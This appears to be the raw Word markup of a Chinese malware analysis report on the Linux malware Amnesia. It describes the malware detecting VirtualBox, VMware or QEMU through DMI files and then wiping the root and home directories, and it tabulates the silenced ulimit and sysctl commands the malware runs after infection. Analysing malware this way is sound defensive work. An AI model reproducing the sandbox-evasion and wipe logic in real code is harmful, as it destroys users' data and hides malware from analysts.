            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21490"/>
                <wp:lineTo x="21560" y="21490"/>
                <wp:lineTo x="2156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8475"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5783107" cy="360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572C" w:rsidRPr="007A375D">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>系统中的</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>/sys/class/dmi/id</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>目录里存放了主机的相关硬件信息，包括产品信息、主板信息、</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>Bios</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>信息等，</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>就是通过读取该目录中的文件获取当前主机的硬件信息。当</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>运行时会读取</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>/sys/class/dmi/id/product_name</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>/sys/class/dmi/id/sys_vendor</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>文件，并匹配其中是否包含关键字</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>“VirtualBox”</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>“VMware”</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>“QEMU”</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:t>来判断当前目标系统是否为虚拟机。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E54939" w:rsidRDefault="00934A03" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="547942A6" wp14:editId="4AFEAE26">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>198120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1188720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5855234" cy="3599180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21493"/>
                <wp:lineTo x="21506" y="21493"/>
                <wp:lineTo x="21506"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55234" cy="359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F572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当检测到当前主机为虚拟机时，</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将开启自我删除，并删除</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>根目录、当前用户主目录、工作目录，这些删除操作相当于擦除整个</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统，会对整个系统造成损害。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E54939" w:rsidRDefault="00E54939" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="000025BD">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="感染后行为"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>感染后行为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D48F4" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当目标系统不是虚拟机环境时，</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>会执行命令来更改系统限制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7654E" w:rsidRDefault="005D48F4" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22CFBF59" wp14:editId="16EC725B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>433705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5870602" cy="3598808"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21497"/>
                <wp:lineTo x="21518" y="21497"/>
                <wp:lineTo x="21518"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0602" cy="35988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5AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00D83C13">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:t>其中主要命令包括</w:t>
      </w:r>
      <w:r w:rsidR="00D83C13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="10"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5039"/>
        <w:gridCol w:w="3817"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00902331" w:rsidTr="0086328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39" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:t>命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3817" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:t>注释</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00902331" w:rsidTr="0086328F">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5039" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>echo 80000500 &gt; /proc/sys/fs/nr_open 1&gt;/dev/null 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3817" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>更改进程可以打开的最大文件描述符的数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00902331" w:rsidTr="0086328F">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5039" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>ulimit -n 1000 1&gt;/dev/null 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3817" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>更改进程可以打开的最大文件描述符的数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00902331" w:rsidTr="0086328F">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5039" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>ulimit -n 10000 1&gt;/dev/null 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3817" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>更改进程可以打开的最大文件描述符的数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00902331" w:rsidTr="0086328F">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5039" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>ulimit -n 100000 1&gt;/dev/null 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3817" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>更改进程可以打开的最大文件描述符的数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00902331" w:rsidTr="0086328F">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5039" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>ulimit -n 1000000 1&gt;/dev/null 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3817" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>更改进程可以打开的最大文件描述符的数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00902331" w:rsidTr="0086328F">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5039" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ulimit -n 10000000 1&gt;/dev/null 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3817" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>更改进程可以打开的最大文件描述符的数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00902331" w:rsidTr="0086328F">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5039" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>echo 1 &gt; /proc/sys/net/ipv4/tcp_tw_recycle 1&gt;/dev/null 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3817" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>开启</w:t>
            </w:r>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>tcp_tw_recycle</w:t>
            </w:r>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>选项，能够更快地回收</w:t>
            </w:r>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>TIME-WAIT</w:t>
            </w:r>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>套接字</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00902331" w:rsidTr="0086328F">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5039" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>sysctl -w net.ipv4.tcp_moderate_rcvbuf="0" 1&gt;/dev/null 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3817" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>关闭</w:t>
            </w:r>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>TCP</w:t>
            </w:r>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>内存自动调整功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00902331" w:rsidTr="0086328F">
        <w:trPr>
          <w:cnfStyle w:val="010000000000" w:firstRow="0" w:lastRow="1"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39" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>sysctl -w fs.file-max=999999999999999999 1&gt;/dev/null 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3817" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00902331">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>更改文件句柄的最大数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
